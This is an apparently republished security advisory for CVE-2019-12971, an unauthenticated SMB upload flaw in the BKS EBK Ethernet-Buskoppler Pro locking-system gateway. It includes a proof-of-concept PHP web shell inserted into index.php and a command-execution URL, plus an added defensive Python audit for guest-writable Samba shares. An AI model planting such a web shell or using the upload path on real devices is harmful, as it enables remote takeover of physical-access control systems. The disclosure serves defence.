
BKS EBK Ethernet-Buskoppler Pro Shell Upload

Posted Jul 3, 2019
Authored by Sebastian Auwaerter | Site syss.de

BKS EBK Ethernet-Buskoppler Pro versions prior to 3.01 suffer from a remote shell upload vulnerability.

tags | exploit, remote, shell
advisories | CVE-2019-12971
SHA-256 | 34bbdc615e014059e3b04c9185a7fd91f2ae36a5796c871aaa3b732608c44564

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2019-017
Product: BKS EBK Ethernet-Buskoppler Pro
Manufacturer: BKS GmbH
Affected Version(s): < 3.01
Vulnerability Type: Unrestricted Upload of File with Dangerous Type (CWE-434)
Risk Level: High
Solution Status: Fixed
Manufacturer Notification: April 23, 2019
Solution Date: June 14, 2019
Public Disclosure: July 03, 2019
CVE Reference: CVE-2019-12971
Author of Advisory: Sebastian Auwaerter, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The "EBK Ethernet-Buskoppler Pro" appliance provided by BKS GmbH is a
gateway to communicate with the access terminals of BKS locking systems.
The appliance is generally attached to a company's IP-based network and
communicates with the locking systems via a proprietary bus system.

Due to an unauthenticated upload functionality through Samba, the BKS
Ethernet-Buskoppler Pro is vulnerable to remote code execution.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

An unauthenticated attacker can connect to an Ethernet-Buskoppler Pro
using any client that supports uploading files via SMB (e.g. smbclient,
Nautilus, Windows Explorer) and overwrite files located in the web root
directory of the appliance. After adding a web shell to any of the
existing PHP scripts, the attacker can execute it by accessing the
edited script via the web server listening on the TCP port 443.

According to BKS, only appliances based on a Raspberry Pi 3 are affected,
since the vulnerability was introduced during an upgrade from
Raspberry Pi 2 to 3.
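
Added example, not part of the SySS advisory or the BKS firmware: a Python audit that flags Samba shares combining guest access, write access and a path overlapping the web root, which is the condition described above. The sample configuration is constructed; the share name webinterface and the path /var/www/ebkpro_website appear in the advisory, but pairing them and all other settings are assumptions.

```python
import posixpath

TRUE = {"yes", "true", "on", "1"}
# smb.conf synonyms -> (canonical name, value is inverted)
ALIASES = {"public": ("guestok", False), "directory": ("path", False),
           "writable": ("readonly", True), "writeable": ("readonly", True),
           "writeok": ("readonly", True)}

def parse_smb_conf(text):
    """Return {section: {parameter: value}}; names lowercased, spaces removed."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = sections.setdefault(line[1:-1].strip().lower(), {})
        elif "=" in line and line[0] not in "#;" and current is not None:
            key, value = (p.strip() for p in line.split("=", 1))
            key = "".join(key.lower().split())
            name, inverted = ALIASES.get(key, (key, False))
            if inverted:
                value = "no" if value.lower() in TRUE else "yes"
            current[name] = value
    return sections

def is_under(path, root):
    path, root = posixpath.normpath(path), posixpath.normpath(root)
    return path == root or path.startswith(root.rstrip("/") + "/")

def guest_writable_web_shares(conf_text, web_root):
    """Names of shares that are guest-accessible, writable and overlap web_root."""
    sections = parse_smb_conf(conf_text)
    defaults = sections.pop("global", {})
    findings = []
    for name, params in sections.items():
        eff = {**defaults, **params}  # [global] values act as share defaults
        guest = eff.get("guestok", "no").lower() in TRUE
        read_only = eff.get("readonly", "yes").lower() in TRUE
        path = eff.get("path", "")
        if guest and not read_only and path and (
                is_under(path, web_root) or is_under(web_root, path)):
            findings.append(name)
    return findings

# Constructed sample configuration (not taken from a real device).
SAMPLE = "\n".join([
    "[global]", "map to guest = Bad User",
    "[webinterface]", "path = /var/www/ebkpro_website", "guest ok = yes",
    "writable = yes", "[docs]", "path = /var/www/docs", "public = yes"])

if __name__ == "__main__":
    print(guest_writable_web_shares(SAMPLE, "/var/www"))
```

The parser ignores include directives and line continuations, so run it on the flattened output of testparm -s rather than on the raw file.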

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

As a proof of concept, the file index.php can be altered via SMB
(e.g. gedit smb://<VULNERABLE_HOST>/webinterface/index.php) to add a
web shell that runs in the context of the user account www-data:

- ----------------
index.php:
<?php

if ($_REQUEST['pw'] === "very-secure-password"){
system($_REQUEST['cmd']);
}
set_include_path('/var/www/ebkpro_website');
include 'include/debug.php';
[...]
- ----------------

The web shell can then be used to execute commands by navigating to the
following URL:

http://<VULNERABLE_HOST>:80/index.php?pw=very-secure-password&cmd=<COMMAND>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

BKS provides update packages for the EBK Ethernet-Buskoppler. The updater
in version 1.2.1.2 contains firmware version 3.01 which fixes the
vulnerability.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2019-04-10: Vulnerability discovered
2019-04-23: Vulnerability reported to manufacturer
2019-06-14: Patch released by manufacturer
2019-07-03: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] SySS Security Advisory SYSS-2019-017
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-017.txt
[2] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Sebastian Auwaerter of SySS
GmbH.

E-Mail: sebastian.auwaerter@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Auwaerter.asc
Key Fingerprint: F98C 3E12 6713 19D9 9E2F BE3E E9A3 0D48 E2F0 A8B6

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

-----END PGP SIGNATURE-----
